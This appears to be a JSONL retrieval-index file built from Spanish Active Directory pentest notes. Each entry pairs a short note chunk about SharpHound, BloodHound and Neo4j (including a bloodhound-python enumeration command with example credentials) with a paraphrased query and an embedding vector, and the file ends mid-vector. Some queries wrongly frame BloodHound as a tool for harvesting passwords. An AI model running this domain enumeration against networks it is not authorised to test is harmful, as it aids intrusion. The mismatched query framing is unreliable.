-0.05534, -0.00985, -0.02524, 0.10441, 0.0817, -0.12514, 0.15555, 0.02327, 0.08898, 0.0477, -0.05666, 0.01123, 0.06223, -0.00561, -0.03518, -0.0173, -0.05943, -0.05626, 0.01916, -0.07235, 0.01069, 0.03399, -0.11759, -0.10802, -0.01903, -0.00387, 0.00222, 0.06324, 0.0067, 0.09676, 0.09487, -0.09592, 0.01285, -0.03377, 0.02, -0.05983, -0.03247, -0.01646, -0.05204, 0.0075, 0.03689, 0.02904, -0.03892, 0.03235, 0.07268, -0.04804, -0.03626, 0.01798, -0.05186, 0.00012, -0.11936, -0.00634, 0.02753, -0.03564, 0.00204, -0.09682, 0.04157, -0.0126, 0.01679, -0.11104, -0.01389, 0.00054, -0.03644, -0.03432, -0.02452, 0.0212, -0.06704, 0.11659, -0.01128, -0.05211, -0.00268, 0.03182, 0.08628, 0.00443, 0.04469, 0.04548, -0.01068, 0.00818, -0.00215, 0.0354, -0.06184, -0.00855, 0.01185, -0.03001, -0.05454, 0.04231, 0.03681, -0.04075, 0.01591, -0.10907, 0.05157, 0.01773, 0.03714, -0.02503, 0.08247, -0.00541, -0.00026, 0.02753, -0.07643, -0.03295, 0.02837, 0.01232, -0.01465, 0.01375, -0.10578, 0.08045, 0.03762, -0.01351, 0.02321, -0.02984, -0.01306, 0.10494, 0.049, 0.01321, -0.0203, 0.01207, -0.0238, -0.07727, -0.01559, -0.00438, 0.03486, 0.05265, -0.00484, -0.02621, 0.06805, 0.06718, -0.05624, 0.07687, -0.05398, -0.0027, -0.00833, 0.00532, 0.0398, -0.04883, -0.05749, -0.00351, -0.03641, 0.09771, -0.00603, 0.03949, -0.07423, -0.01061, -0.01501, -0.00792, 0.06543, 0.04573, -0.02959, -0.09372, -0.03892, -0.08534, 0.04226, -0.03233, -0.02638, -0.01867, 0.0417, 0.0492, -0.01889, 0.01957, 0.03949]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versiΓ³n `.exe` (subes a vΓ­ctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz grΓ‘fica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "indexar": "que programa puedo usar para visualizar las conexiones de dominio activo directorio?", "v": [0.07521, 0.07796, -0.17077, -0.18542, 0.01908, -0.01597, 0.02347, -0.07902, -0.18351, -0.00437, 0.04525, -0.17928, -0.10485, -0.18497, 0.00561, -0.05379, 0.23553, -0.08776, -0.01483, -0.10542, 0.04466, 0.00078, -0.06331, 0.01225, 0.02291, 0.06245, 0.003, -0.09548, 0.02581, 0.0697, 0.0327, -0.01934, 0.12859, -0.02842, -0.0018, -0.05694, 0.0207, 0.05706, 0.14132, 0.09643, 0.01048, 0.00502, -0.14946, 0.02189, 0.01333, 0.03704, 0.02218, -0.13588, -0.0598, -0.04037, 0.00355, -0.02409, -0.09932, -0.06572, 0.06196, -0.04145, 0.07269, -0.12938, -0.00413, -0.04976, 0.00345, -0.03958, 0.03729, 0.05551, -0.08259, -0.13445, 0.09463, 0.01575, -0.11228, 0.07138, -0.02038, 0.06973, 0.08479, 0.07058, 0.08282, 0.0225, 0.11341, -0.10813, 0.02401, 0.02595, -0.00466, -0.00981, 0.02021, -0.01408, -0.2239, -0.10761, -0.01394, -0.11916, 0.07936, -0.07972, 0.05346, 0.0757, -0.05991, 0.0216, 0.03427, -0.0172, -0.00409, 0.00904, 0.00567, 0.02337, 0.11956, 0.12181, -0.09441, 0.13306, 0.10565, 0.04294, 0.02834, 0.01783, -0.06358, 0.0802, -0.0313, -0.06134, -0.02818, -0.0978, -0.03908, 0.07448, -0.10297, -0.03897, 0.04339, -0.06746, -0.02686, -0.02959, 0.01451, 0.07269, 0.05685, 0.00671, 0.0395, 0.06321, -0.09378, 0.00685, 0.02192, 0.00416, -0.01432, -0.10037, -0.06794, -0.01058, 0.06174, -0.00476, 0.00588, -0.08049, 0.01227, 0.01529, -0.03752, 0.03537, -0.00662, -0.03412, 0.01766, -0.08297, -0.01868, 0.03089, -0.00791, -0.02677, -0.04253, 0.03948, 0.02731, 0.03819, 0.05257, 0.03875, -0.00962, 0.02602, -0.06522, -0.03609, -0.04406, -0.01801, 0.03308, -0.04753, -0.01431, 0.02975, 0.02734, 0.06938, -0.01654, 0.0873, 0.00437, -0.07207, -0.05949, -0.01168, -0.00087, -0.05247, 0.02415, 0.00287, -0.04011, -0.05498, 0.02944, -0.01336, -0.03586, 0.07592, -0.01871, 0.02987, -0.02026, 0.03681, 0.01336, 0.07639, -0.00861, 0.02029, 0.0468, -0.04067, 0.00208, -0.01577, 0.0522, -0.05267, -0.02234, -0.00028, -0.00051, -0.02247, 0.0271, 0.04232, -0.0302, 0.01392, 0.05543, 0.04433, -0.01092, -0.03447, 0.07434, -0.02201, -0.02226, 0.02347, -0.03847, 0.03671, 0.01966, -0.01775, -0.04639, 0.00864, -0.02036, 0.02435, 0.09156, -0.065, 0.00191, -0.03266, 0.01578, 0.03213, -0.04842, -0.02029, -0.00358, -0.04307, 0.03818, -0.01523, -0.00519, 0.00548, 0.00464, 0.00521, -0.06501, 0.06746, 0.02108, 0.0277, -0.07346, -0.01704, -0.06879, 0.02971, -0.03443, -0.01117, -0.00113, 0.02768, 0.03461, -0.03068, -0.01685, 0.05225]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versiΓ³n `.exe` (subes a vΓ­ctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz grΓ‘fica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "indexar": "cual es una herramienta que permita mapear la infraestructura de Active Directory desde un script?", "v": [-0.04262, 0.05121, -0.05126, -0.26203, 0.02211, -0.16266, -0.06474, -0.02739, -0.15515, 0.01333, 0.01226, -0.06552, -0.01565, -0.09289, 0.04355, 0.07815, 0.08865, -0.12392, -0.01018, -0.04936, -0.01896, 0.09421, -0.11326, 0.10287, -0.12362, 0.01499, 0.01682, -0.07543, -0.26689, -0.09388, 0.04127, 0.09759, 0.05867, -0.06682, -0.02991, -0.19303, -0.00679, 0.03983, 0.00593, 0.03927, -0.1203, -0.01102, -0.07892, 0.09399, 0.08139, 0.03818, -0.02268, -0.02164, 0.09274, 0.02909, -0.12154, -0.09441, -0.07243, -0.03535, 0.09473, 0.01917, 0.11657, -0.137, -0.03081, -0.06065, -0.10845, -0.05162, -0.08516, -0.10286, -0.02444, -0.01404, 0.05998, -0.13358, -0.16058, 0.04911, 0.06949, 0.06681, -0.00784, 0.12398, 0.03366, -0.01302, -0.00049, -0.04572, -0.07101, 0.0964, 0.11628, 0.01656, -0.06838, 0.08729, -0.06284, -0.0995, 0.01928, -0.01646, 0.05026, -0.01421, -0.04592, 0.09627, -0.03101, 0.07682, 0.02119, -0.05048, 0.06239, 0.057, 0.02888, -0.00214, 0.04606, 0.02152, -0.05712, 0.07482, 0.05626, 0.05033, -0.01053, 0.10576, -0.12264, 0.04251, 0.06001, 0.0729, 0.04633, -0.04103, 0.05016, 0.07558, -0.03494, -0.07636, 0.00329, -0.0967, -0.01458, 0.05439, -0.05745, 0.00201, 0.00443, 0.04489, -0.06663, 0.03209, 0.07186, -0.00902, 0.03424, 0.04107, -0.01857, -0.06607, -0.10879, -0.00045, -0.02143, -0.09681, -0.00755, -0.03951, -0.01208, -0.00976, 0.01986, -0.02304, -0.039, 0.0337, -0.00463, -0.03047, -0.04473, -0.0231, -0.00087, 0.0385, -0.04269, 0.02751, 0.00633, 0.07323, 0.03884, 0.01687, -0.14403, 0.0516, -0.02791, -0.02801, 0.01175, 0.03063, 0.01609, -0.03379, -0.07096, 0.05318, 0.05861, 0.07917, 0.00404, 0.04875, 0.03909, -0.0305, -0.04378, -0.05969, -0.04215, 0.00255, -0.00027, -0.03847, -0.03638, -0.05768, -0.02689, 0.05278, -0.02399, -0.00561, 0.02392, -0.04864, 0.00795, 0.00028, 0.02346, 0.06064, 0.03563, -0.02621, -0.00566, -0.07231, 0.01285, -0.04782, 0.01863, -0.01131, -0.0351, 0.0068, -0.00066, -0.04189, 0.01029, 0.06775, 0.01828, -0.0296, -0.00412, 0.00969, 0.02037, -0.02076, 0.06349, -0.00874, -0.01623, -0.01477, 0.03817, 0.05588, -0.03797, 0.0153, 0.03061, -0.01219, -0.00671, -0.01594, -0.01223, 0.01777, 0.02091, 0.02579, -0.0045, -0.02942, 0.04384, -0.04078, -0.0066, -0.00997, -0.00344, -0.01604, 0.02029, -0.07865, -0.04328, -0.03091, 0.04624, 0.07342, -0.02333, -0.05081, -0.05574, 0.00523, 0.03612, -0.01647, -0.03574, -0.08463, -0.00346, 0.00862, 0.06156, -0.01194, 0.01262, -0.04472]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versiΓ³n `.exe` (subes a vΓ­ctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz grΓ‘fica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "indexar": "necesito una interfaz grΓ‘fica para analizar relaciones en Active Directory, cual recomendarΓ­as?", "v": [-0.01202, 0.20298, -0.10667, -0.1812, 0.18053, -0.1178, 0.01273, 0.02527, -0.13237, 0.04356, 0.12596, -0.12627, -0.11708, -0.07941, 0.1179, 0.02196, 0.09014, -0.00324, 0.01662, -0.00254, 0.08565, 0.00325, -0.15735, -0.00836, -0.07264, -0.00959, 0.0025, -0.09083, 0.01127, 0.02407, -0.06668, -0.07294, 0.07264, -0.08973, -0.1002, -0.03105, -0.02642, 0.00117, 0.08678, -0.04136, -0.04943, 0.04253, -0.14291, -0.00833, 0.07462, 0.01778, -0.12047, -0.10058, -0.07955, 0.04469, -0.02134, -0.11903, -0.05463, 0.0486, 0.03587, -0.06217, 0.12295, -0.03631, 0.03913, -0.05293, 0.05177, -0.02225, 0.02959, -0.07703, -0.03303, -0.00418, 0.0046, -0.09896, -0.02345, 0.03094, -0.04997, 0.10662, -0.07196, 0.08607, 0.08697, 0.05404, 0.05634, 0.01225, 0.08208, 0.01499, 0.13815, 0.04385, -0.00836, 0.07352, -0.09135, -0.0633, 0.03152, -0.03439, 0.0204, 0.0179, 0.04992, -0.01722, -0.1046, -0.05057, 0.07461, 0.00035, 0.00744, 0.06651, 0.08744, -0.01423, 0.01669, -0.10514, -0.07608, 0.09256, -0.0244, -0.02302, -0.0891, 0.00876, -0.05872, 0.08527, 0.01484, -0.0064, 0.08273, -0.04883, -0.02052, 0.00826, -0.05645, -0.06503, 0.00163, -0.02881, -0.08092, -0.0108, 0.00097, 0.02523, -0.11001, 0.02588, 0.02355, 0.03111, 0.07183, 0.08218, -0.04552, -0.01333, -0.08009, -0.19727, -0.06965, 0.00825, 0.00829, -0.00879, 0.01235, -0.10975, 0.03056, 0.02467, 0.0307, -0.02653, 0.01676, 0.09842, 0.05278, 0.00359, -0.0416, 0.06088, 0.03279, 0.02156, 0.01452, 0.04238, 0.0577, 0.01137, 0.02852, -0.05587, -0.00053, -0.02364, 0.0939, 0.02182, 0.0322, 0.03728, 0.03459, -0.05803, -0.14433, 0.01042, 0.04108, 0.02865, 0.01392, 0.04769, -0.04912, -0.07716, 0.05476, -0.04762, 0.01411, -0.02455, -0.02834, -0.05388, 0.06102, 0.0277, 0.00576, 0.00189, -0.08816, 0.01067, -0.04626, -0.02066, 0.04083, -0.01084, 0.01214, 0.07036, -0.02163, 0.00457, 0.05149, -0.07762, 0.02818, -0.01602, -0.03737, -0.0261, 0.04472, -0.01445, -0.0463, -0.04691, 0.05156, 0.04498, -0.0736, 0.08988, 0.0154, -0.00358, -0.04316, -0.01828, 0.0287, -0.02027, -0.06537, -0.02985, 0.05052, -0.00421, 0.0231, 0.01181, -0.00046, 0.0326, 0.04245, -0.05978, 0.05382, -0.02775, 0.01764, 0.02081, -0.01363, 0.037, -0.04068, 0.01555, 0.0059, -0.04062, 0.02421, 0.05093, -0.00546, -0.11018, -0.03045, -0.08132, 0.10597, 0.06522, -0.06918, 0.02521, -0.05664, -0.09416, -0.05987, 0.02788, 0.00364, -0.10361, 0.00374, 0.05364, 0.08885, -0.00304, 0.03735, -0.04535]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Neo4j (la BD que necesita BloodHound)\nsudo apt install -y neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "que programa necesito instalar para manejar relaciones complejas de usuarios como en BloodHound?", "v": [-0.01946, 0.12175, -0.06023, -0.22445, -0.02933, -0.03141, -0.08606, -0.0291, -0.1016, -0.05132, -0.05081, 0.00673, 0.01146, -0.04729, -0.07636, -0.03046, -0.00963, -0.08567, 0.08925, 0.03104, -0.05513, -0.08286, -0.03703, 0.06108, -0.11822, 0.07655, 0.07882, -0.01597, -0.0873, -0.05081, -0.0747, -0.1366, 0.03458, 0.0399, -0.05002, 0.0675, -0.09483, -0.01712, -0.00194, 0.13539, 0.04553, -0.02698, -0.03706, -0.03783, 0.08459, 0.0791, -0.02287, -0.06247, 0.05816, -0.01105, -0.00233, 0.09268, -0.11117, -0.0353, 0.06686, -0.12489, 0.10554, -0.17701, -0.07076, 0.00756, -0.0899, -0.04526, 0.08027, 0.11234, -0.00982, -0.04125, 0.08727, -0.01591, -0.09152, 0.0878, -0.0915, 0.0852, -0.05798, -0.01046, -0.02974, 0.03612, 0.08343, -0.03896, 0.05565, -0.02277, 0.00902, 0.03952, 0.05922, 0.05345, -0.09464, -0.04112, 0.14939, -0.00805, 0.09572, 0.03955, 0.06928, -0.0678, -0.02573, 0.04331, 0.11861, -0.15861, 0.10003, 0.04509, 0.15368, -0.01329, -0.00973, 0.00587, -0.02718, 0.14766, -0.12096, -0.04808, 0.0557, -0.10955, 0.01311, 0.01614, 0.00243, 0.03309, 0.02697, -0.05735, -0.08758, -0.01295, 0.10447, 0.04078, 0.03227, -0.0804, -0.16267, 0.01844, 0.0767, 0.00737, 0.00299, -0.06941, 0.02166, 0.07164, 0.00372, 0.10269, -0.0849, -0.01303, -0.0611, -0.06375, -0.03087, -0.01973, 0.00921, -0.04526, -0.03197, -0.08908, -0.02157, 0.06376, 0.01333, -0.05961, 0.04539, 0.03492, -0.015, -0.03416, 0.02366, 0.01517, 0.10312, 0.02976, -0.01707, 0.08624, -0.05129, -0.08171, 0.03621, -0.03197, -0.01352, -0.01121, -0.00274, -0.0524, -0.01069, -0.08792, 0.00944, 0.04288, -0.11232, 0.06274, 0.07155, 0.04442, -0.00429, 0.04584, 0.04004, 0.01193, 0.02063, -0.05711, 0.06976, -0.14195, -0.02021, 0.01292, -0.01134, 0.04003, 0.05839, 0.04853, -0.00877, -0.04893, -0.11009, 0.02474, 0.0185, -0.02141, 0.03978, 0.06226, 0.01056, -0.03839, 0.05303, -0.01133, -0.00061, -0.06082, -0.00796, -0.0427, 0.05802, 0.01429, -0.02532, -0.01862, 0.05088, 0.03358, -0.00226, 0.02832, 0.01412, 0.05511, 0.02699, -0.01794, -0.00793, -0.02535, 0.04023, -0.04761, -0.00179, 0.03583, 0.0462, 0.00526, 0.00053, 0.03201, 0.02569, -0.01264, -0.00129, -0.06012, -0.02048, 0.01021, 0.02982, 0.02218, -0.05151, 0.00318, -0.04507, -0.04712, 0.04433, 0.06914, 0.02028, -0.07551, 0.0001, -0.04853, 0.07207, 0.08243, 0.05082, -0.0725, -0.09399, -0.08022, -0.02215, 0.02927, -0.01622, -0.04526, -0.02128, 0.02099, 0.08456, 0.01117, 0.02789, 0.03356]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Neo4j (la BD que necesita BloodHound)\nsudo apt install -y neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "con que puedo montar un sistema de anΓ‘lisis de grafos y conexiones entre entidades?", "v": [0.01448, 0.10187, -0.0644, -0.19343, -0.02335, -0.01595, -0.00175, 0.0512, -0.17149, 0.00168, -0.08704, -0.01117, -0.08453, 0.01213, 0.18792, 0.11439, 0.00537, -0.13224, -0.04573, -0.05147, -0.06993, -0.08343, 0.00202, -0.12182, -0.10922, 0.02887, -0.00613, -0.13341, -0.03328, 0.08562, -0.02512, 0.02658, 0.0182, -0.05339, -0.12243, -0.0983, 0.04144, 0.09963, 0.11556, -0.037, -0.06173, -0.13985, 0.00496, 0.00918, 0.09625, -0.10608, -0.09799, -0.01582, -0.00356, -0.0199, -0.00213, -0.04537, -0.16333, -0.0465, -0.09054, -0.16505, 0.04208, -0.13122, 0.087, -0.03377, 0.03165, 0.15769, -0.0129, 0.03052, 0.08973, 0.01903, -0.00316, -0.04695, -0.06942, 0.06816, 0.0446, 0.01239, -0.04236, 0.01515, 0.04584, 0.06586, 0.05027, -0.05253, 0.06186, 0.07406, 0.02401, 0.00959, -0.11736, 0.12797, -0.12062, 0.00822, -0.05275, 0.0031, -0.00856, -0.0223, -0.00364, -0.00931, 0.00682, 0.06123, 0.02516, -0.00073, -0.04445, 0.01452, 0.02193, -0.01385, 0.08171, 0.06447, -0.13042, 0.11703, -0.02135, -0.06601, 0.0716, 0.03845, 0.04442, -0.02014, 0.07817, 0.12241, 0.016, 0.01302, -0.10738, -0.10683, -0.03223, 0.05959, -0.03722, -0.04633, -0.00765, 0.02005, 0.02361, 0.00439, -0.06738, 0.00273, 0.08003, 0.17374, 0.02982, 0.04542, 0.02666, 0.02006, -0.08846, -0.11369, -0.09957, 0.0009, -0.01393, -0.02565, -0.02628, -0.01505, 0.00657, 0.05261, 0.02708, -0.03474, 0.00795, 0.06223, 0.01494, -0.09357, -0.06922, -0.05328, -0.07367, 0.04357, -0.05878, -0.02062, 0.0198, 0.0226, 0.02842, -0.00446, 0.03275, 0.01582, -0.03651, -0.00942, 0.02955, 0.00718, -0.03136, 0.02856, -0.1018, -0.00092, 0.0411, 0.04422, -0.04294, 0.04025, 0.02546, -0.03745, 0.08178, 0.01251, -0.08179, -0.09777, -0.04563, 0.01613, -0.06704, -0.06449, 0.03802, -0.00586, -0.01837, 0.04448, 0.01833, 0.0369, 0.07227, 0.0423, 0.03155, 0.05092, -0.02276, 0.09366, 0.08795, -0.06087, 0.04691, 0.00697, 0.03321, 0.02559, -0.02674, 0.00154, 0.00691, -0.02572, -0.02201, 0.11077, -0.00439, 0.04311, 0.07653, 0.06732, 0.06691, 0.04639, 0.04006, -0.07004, -0.03336, 0.0468, -0.02653, 0.02859, -0.00281, 0.01295, -0.00231, 0.02111, 0.01475, 0.06466, 0.00769, -0.04863, -0.04182, 0.02174, 0.01624, -0.08388, 0.0069, -0.03217, 0.01407, 0.01791, -0.02199, -0.03592, 0.03185, -0.04304, -0.02948, -0.02332, 0.04358, 0.08147, -0.04944, 0.0034, -0.00835, -0.05854, -0.0731, -0.03644, -0.02127, -0.09514, -0.00157, 0.03045, 0.04877, -0.03239, 0.04877, -0.01349]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Neo4j (la BD que necesita BloodHound)\nsudo apt install -y neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "cual es una alternativa libre a las herramientas tradicionales de mapeo social", "v": [0.12263, 0.06989, -0.07681, -0.05917, -0.15401, -0.03894, -0.01327, -0.06254, -0.06023, -0.03213, -0.08963, -0.07597, 0.01988, -0.00815, 0.07389, 0.02242, 0.1262, -0.07616, 0.1443, -0.06287, -0.08145, 0.05766, -0.18645, -0.05661, -0.07721, -0.14248, 0.06268, -0.05342, -0.19879, 0.11451, 0.04005, 0.06662, 0.07877, -0.09097, -0.06998, -0.02659, 0.11399, 0.00971, -0.05887, -0.1325, 0.04419, -0.14538, -0.04654, 0.06891, -0.08902, -0.04191, -0.11391, 0.06125, -0.03705, 0.1337, -0.10691, -0.10555, -0.08396, 0.00505, 0.0421, -0.06283, 0.13212, -0.07488, -0.10597, -0.04535, -0.14246, 0.08824, -0.00041, -0.02052, 0.05005, -0.02092, 0.0011, 0.00254, -0.06717, 0.10225, 0.05936, 0.06656, 0.02731, 0.02805, -0.09458, 0.04374, -0.03475, 0.06275, -0.06692, 0.01349, 0.00615, -0.03855, -0.04536, 0.02661, -0.04043, -0.04931, 0.06727, -0.12793, 0.01963, -0.05228, 0.01916, 0.07067, 0.01418, 0.07083, 0.00684, -0.06178, -0.06079, 0.05723, -0.03218, 0.04967, 0.04143, -0.02852, -0.09868, -0.05317, -0.01563, -0.096, -0.03835, 0.07324, -0.04395, 0.05557, 0.04304, 0.06318, -0.00883, 0.08154, 0.05796, 0.06536, -0.05942, 0.03735, 0.01304, -0.04743, 0.0113, 0.06894, -0.02907, -0.07903, 0.0253, 0.05978, -0.00979, 0.08928, 0.0331, -0.00945, 0.03181, -0.02032, -0.0455, -0.07477, -0.08774, -0.03261, 0.07318, -0.11683, 0.02048, -0.04922, -0.01308, 0.04969, -0.04432, -0.17208, 0.05123, 0.01216, 0.02188, -0.0546, -0.02132, -0.00054, -0.09042, 0.06229, -0.01828, 0.10164, -0.02486, 0.01663, -0.11035, 0.00531, -0.10236, 0.09461, 0.02893, -0.07568, 0.03582, -0.03037, -0.01493, 0.0035, 0.04985, 0.01472, -0.00612, -0.03071, 0.00515, 0.05162, 0.07962, -0.03707, 0.04211, -0.03569, -0.04996, -0.07987, 0.0614, 0.00389, -0.05158, 0.04043, -0.06652, -0.02125, 0.03925, -0.04077, -0.0491, 0.00231, 0.03792, 0.02165, -0.07171, -0.01348, -0.01393, -0.05684, 0.01277, -0.0056, 0.04113, 0.00338, -0.02181, -0.0512, -0.06459, 0.03865, -0.04934, -0.03078, -0.04875, 0.07099, 0.00486, -0.02589, -0.02055, 0.07961, 0.00618, -0.04515, 0.06834, 0.00225, -0.03937, -0.02836, 0.00988, -0.06442, 0.02965, -0.00338, 0.02622, 0.03237, 0.07053, 0.02815, -0.00605, 0.04043, 0.04069, 0.06422, -0.03833, -0.01757, 0.06548, -0.01531, -0.03266, 0.03088, 0.0393, -0.03578, 0.0017, -0.02397, -0.02171, 0.00233, 0.07082, 0.05424, 0.00785, 0.01383, -0.09272, 0.01783, -0.0544, -0.05953, -0.02418, -0.03633, -0.04099, 0.04959, 0.07325, 0.00638, -0.00379, 0.00398]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# 1) Recolectar datos desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "que programa puedo usar para recolectar credenciales de un dominio local?", "v": [-0.11702, -0.04754, -0.23279, -0.09044, 0.09259, -0.03287, 0.1706, 0.03065, -0.14604, -0.13467, -0.16932, -0.0383, 0.00106, -0.24829, 0.07411, -0.01006, 0.07903, -0.02153, -0.02594, -0.08085, -0.11344, -0.12851, -0.01646, 0.02567, 0.07842, 0.04, 0.02125, -0.07907, 0.09213, 0.08679, 0.07575, 0.00499, 0.00758, -0.0524, 0.00855, -0.01164, 0.0065, 0.06454, 0.02391, 0.03626, 0.01322, -0.02357, -0.18364, 0.02263, 0.02576, 0.05858, -0.06769, -0.10235, -0.13435, -0.11706, -0.05788, -0.10781, -0.10504, -0.04818, 0.07056, -0.01194, -0.01245, -0.13163, -0.01452, 0.00237, -0.0346, -0.03683, -0.02485, 0.05196, -9e-05, -0.10893, 0.02776, 0.01139, -0.056, 0.01123, 0.01055, 0.01931, 0.1273, -0.02921, 0.04917, -0.00848, 0.01731, -0.08764, 0.16766, -0.07722, 0.04506, -0.01912, 0.06463, 0.01772, -0.07895, -0.07781, 0.04113, -0.15845, 0.08679, -0.01426, 0.03339, 0.03112, -0.00902, 0.00445, 0.03145, -0.0728, 0.0658, 0.00013, -0.01616, 0.05131, 0.07879, -0.03164, -0.03003, 0.12787, 0.06759, 0.07819, 0.07761, -0.02234, -0.00475, -0.00116, 0.00402, -0.04493, -0.12182, -0.01013, -0.1006, 0.08203, -0.05966, 0.02938, 0.06614, -0.09845, -0.00952, -0.07758, 0.04296, -0.01063, 0.0734, 0.00183, -0.06189, 0.00036, -0.04209, -0.03791, -0.02092, 0.04047, 0.00449, -0.05784, -0.01826, -0.02779, 0.05034, -0.06396, -0.07494, 0.03562, 0.0035, 0.0249, -0.05518, -0.00202, 0.04851, -0.04301, -0.03344, -0.1205, 0.02479, -0.05012, 0.04818, 0.04716, -0.00364, 0.04557, -0.02437, 0.07795, 0.03788, -0.00383, 0.00319, 0.0051, -0.05969, -0.03652, -0.01016, -0.00083, 0.01945, -0.07135, 0.03946, -0.01423, 0.07201, 0.07597, -0.03488, 0.08729, -0.05894, -0.04737, 0.01486, -0.00888, 0.01271, -0.06737, 0.01934, -0.0456, -0.04604, -0.00326, 0.0244, 0.05079, -0.00857, 0.05978, -0.01684, 0.02099, -0.02706, 0.02213, 0.00698, 0.02422, -0.02517, 0.04388, -0.00079, -0.01871, 0.02619, 0.03614, 0.02512, 0.01928, -0.11209, -0.02672, -0.039, 0.01029, 0.05034, 0.0839, -0.03054, -0.00252, 0.03494, 0.08007, -0.0293, -0.05905, 0.06082, -0.00765, -0.02931, -0.05135, -0.02049, 0.01585, -0.03637, -0.02474, 0.00858, 0.02114, 0.02622, 0.04548, 0.01906, -0.04208, 0.05982, -0.00536, 0.0653, 0.05842, -0.03946, 0.01327, -0.02982, -0.04408, 0.0161, 0.00663, 0.0336, 0.01989, -0.00276, -0.07988, -0.04583, 0.07575, -0.0076, -0.03832, -0.09285, -0.0207, -0.12695, 0.04025, 0.01713, 0.01283, 0.00075, 0.01814, 0.08263, -0.02977, 0.03833, 0.06046]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# 1) Recolectar datos desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "con que herramienta obtengo los nombres de usuario y contraseΓ±as de una red corporativa?", "v": [0.0762, -0.01674, -0.03502, -0.23394, 0.09737, -0.09659, 0.02482, -0.08457, -0.08765, -0.12026, -0.07791, -0.00068, -0.0783, -0.10179, 0.0201, 0.09019, 0.14343, -0.031, 0.00028, 0.03939, 0.01245, -0.03969, -0.07868, 0.07583, -0.00447, -0.0779, 0.07631, -0.0664, -0.01798, 0.1229, 0.03246, 0.01718, 0.02525, -0.03963, -0.09486, 0.09635, -0.0324, 0.01676, -0.02926, 0.13224, 0.06244, 0.04981, -0.17979, 0.06529, 0.0814, 0.06301, -0.11985, 0.07094, 0.01019, 0.05783, -0.00713, -0.12634, -0.16961, -0.10959, -0.0397, -0.11443, 0.16974, -0.01568, -0.04379, -0.04303, -0.07618, 0.03801, 0.01669, 0.16069, -0.10136, -0.06672, 0.02303, -0.09277, -0.09639, 0.04835, 0.04, 0.02487, -0.09579, -0.03481, 0.14347, 0.00176, 0.03759, -0.0128, 0.03227, 0.02958, -0.03903, -0.07243, -0.04254, -0.03584, -0.15845, -0.07466, 0.06753, -0.00971, 0.06177, -0.0979, 0.04258, -0.00758, -0.0198, 0.03962, -0.033, -0.01117, 0.03939, -0.03741, -0.07919, -0.02161, -0.03109, 0.09409, -0.04624, 0.04115, -0.05911, 0.01863, -0.08252, -0.08829, 0.0044, -0.05479, 0.07935, 0.02648, 0.00324, -0.00652, 0.03846, 0.03107, 0.01678, -0.09923, 0.00851, -0.02241, -0.05201, -0.03921, 0.03623, 0.01977, -0.00363, -0.00845, -0.02626, 0.04065, -0.03547, -0.11817, -0.07326, -0.04074, -0.07043, 0.00977, -0.06768, 0.0323, 0.00416, -0.09508, 0.00401, -0.07824, -0.03383, 0.02455, -0.01592, -0.07699, 0.10915, 0.13166, 0.07973, -0.05644, -0.04122, 0.0987, -0.01721, -0.03674, -0.03942, 0.02304, -0.09414, 0.04695, -0.05222, -0.00121, -0.06168, 0.11694, -0.0115, -0.09725, -0.05043, 0.05628, -0.05368, -0.04221, 0.01023, -0.00982, 0.12459, 0.04575, 0.03289, 0.04243, -0.02611, -0.04963, -0.01133, -0.0652, -0.03201, -0.08507, 0.00279, -0.0795, -0.07854, -0.03999, -0.03042, 0.00958, 0.01623, -0.07728, 0.04671, 0.01169, 0.01416, -0.03345, -0.00555, 0.04665, -0.0264, -0.00357, 0.00219, -0.00249, 0.0179, -0.04203, 0.02746, -0.07041, -0.04415, -0.03282, -0.05756, -0.01377, 0.05585, 0.04271, -0.01492, 0.03025, -0.0263, 0.04534, 0.02961, -0.00871, 0.00544, -0.03371, -0.08548, -0.10575, 0.00505, 0.00771, -0.01433, -0.00952, 0.02936, 0.00241, 0.07096, 